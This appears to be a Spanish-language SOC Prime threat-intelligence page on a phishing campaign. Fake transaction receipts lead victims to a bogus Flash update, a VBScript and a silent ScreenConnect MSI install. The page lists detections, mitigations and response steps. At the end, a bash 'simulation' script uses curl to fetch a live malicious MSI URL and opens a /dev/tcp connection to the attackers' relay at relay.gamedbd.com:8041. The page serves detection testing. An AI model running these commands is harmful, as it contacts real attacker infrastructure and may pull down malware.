SOC Prime Bias: High

19 Aug 2026 07:43 UTC

Malware de Phishing/Estafa: Correos electrónicos de Phishing disfrazados como Recibos de Transacciones

Author Photo
SOC Prime Team linkedin icon Seguir
Malware de Phishing/Estafa: Correos electrónicos de Phishing disfrazados como Recibos de Transacciones
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Los actores de amenazas están enviando correos electrónicos de phishing que se hacen pasar por empleados de empresas de EE. UU. e incluyen archivos adjuntos disfrazados como recibos de transacciones. El ataque utiliza un PDF malicioso para atraer a los usuarios a descargar una supuesta actualización de Adobe Flash Player que en realidad lanza un VBScript. El script luego instala la herramienta legítima de gestión remota ScreenConnect para establecer acceso remoto persistente para actividad posterior.

Investigación

AhnLab Security Intelligence Center (ASEC) identificó la campaña examinando el contenido del correo electrónico de phishing y el comportamiento del PDF adjunto. La investigación rastreó la cadena de ejecución desde el VBScript malicioso hasta la recuperación del payload en segundo plano y la instalación silenciosa de un paquete MSI utilizando curl.exe and msiexec.exe.

Mitigación

Los usuarios deben ser entrenados para reconocer intentos de phishing que involucren recibos de transacciones inesperados y solicitudes para instalar actualizaciones de software como Adobe Flash Player. Las organizaciones deben restringir la ejecución de VBScript y monitorear el uso no autorizado de herramientas de gestión remota, incluyendo ScreenConnect. La lista de aplicaciones permitidas también puede ayudar a prevenir la ejecución de paquetes MSI desconocidos o no aprobados.

Respuesta

Si se detecta actividad maliciosa, el sistema afectado debe ser aislado inmediatamente para prevenir el acceso remoto a través de ScreenConnect. Los respondedores deben terminar sesiones activas asociadas con relay.Gamedbd.Com la infraestructura e inspeccionar el registro para obtener información de sesiones almacenadas. Una investigación forense completa también debe determinar si ocurrió movimiento lateral o exfiltración de datos a través de la herramienta de gestión remota.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Detecciones

LOLBAS WScript / CScript (vía process_creation)

Equipo de SOC Prime
18 Ago 2026

Software de Acceso/Administración Remota Alternativo (vía process_creation)

Equipo de SOC Prime
18 Ago 2026

Posible Infiltración/Exfiltración de Datos/C2 a través de Servicios/Herramientas de Terceros (vía proxy)

Equipo de SOC Prime
18 Ago 2026

Posible Infiltración/Exfiltración de Datos/C2 a través de Servicios/Herramientas de Terceros (vía dns)

Equipo de SOC Prime
18 Ago 2026

IOCs (HashMd5) para detectar: Malware Phishing/Estafa: Correos Electrónicos de Phishing Disfrazados como Recibos de Transacciones

Reglas de IA de SOC Prime
18 Ago 2026

Detección de Correos Electrónicos de Phishing Disfrazados como Recibos de Transacciones [Proxy]

Reglas de IA de SOC Prime
18 Ago 2026

Correo Electrónico de Phishing que Suplanta un Recibo de Transacción que Conduce a la Instalación de un Paquete MSI [Creación de Procesos de Windows]

Reglas de IA de SOC Prime
18 Ago 2026

Ejecución de Simulación

Requisito previo: La Verificación de Telemetría & Línea Base de Pre-vuelo debe haber pasado.

Rationale: Esta sección detalla la ejecución precisa de la técnica adversaria (TTP) diseñada para activar la regla de detección. Los comandos y narrativas DEBEN reflejar directamente las TTPs identificadas y aspirar a generar la telemetría exacta esperada por la lógica de detección. Los ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.

  • Narrativa del Ataque & Comandos: El adversario inicia una campaña de phishing enviando un correo electrónico sobre una transacción fallida. El enlace dirige a la víctima a https://transaction-sucessful.vercel.app, que aloja un recibo falso. Cuando la víctima hace clic en «Descargar Recibo», el navegador intenta obtener https://payment-six-eta.vercel.app/doc/sc.msi. Una vez que el payload se ejecuta, intenta establecer una sesión de acceso remoto conectándose al relay de ScreenConnect en relay.gamedbd.com:8041. Esta secuencia prueba tanto la detección basada en URL como la lógica de detección basada en dominio/puerto.

  • Script de Prueba de Regresión:

    #!/bin/bash
    # Script de simulación para activar la regla de detección de Phishing/ScreenConnect
    
    echo "[+] Iniciando Simulación: Prueba de Detección de Phishing/ScreenConnect"
    
    # 1. Simular la descarga del MSI malicioso desde la URL de Vercel
    echo "[+] Paso 1: Simulando conexión a URL maliciosa de Vercel..."
    curl -s -o /dev/null "https://payment-six-eta.vercel.app/doc/sc.msi"
    
    # 2. Simular la conexión al dominio/puerto específico del relay de ScreenConnect
    echo "[+] Paso 2: Simulando conexión al relay malicioso de ScreenConnect..."
    # Usamos /dev/tcp para simular un intento de conexión sin necesidad de un oyente real
    timeout 2 bash -c 'cat < /dev/null > /dev/tcp/relay.gamedbd.com/8041' 2>/dev/null
    
    echo "[+] Simulación Completa. Verifique SIEM para alertas."
  • Comandos de Limpieza:

    # No se crean artefactos persistentes con esta simulación basada en red.
    # Si se descargaron archivos locales, deben ser eliminados:
    rm -f sc.msi
    echo "[+] Limpieza completa."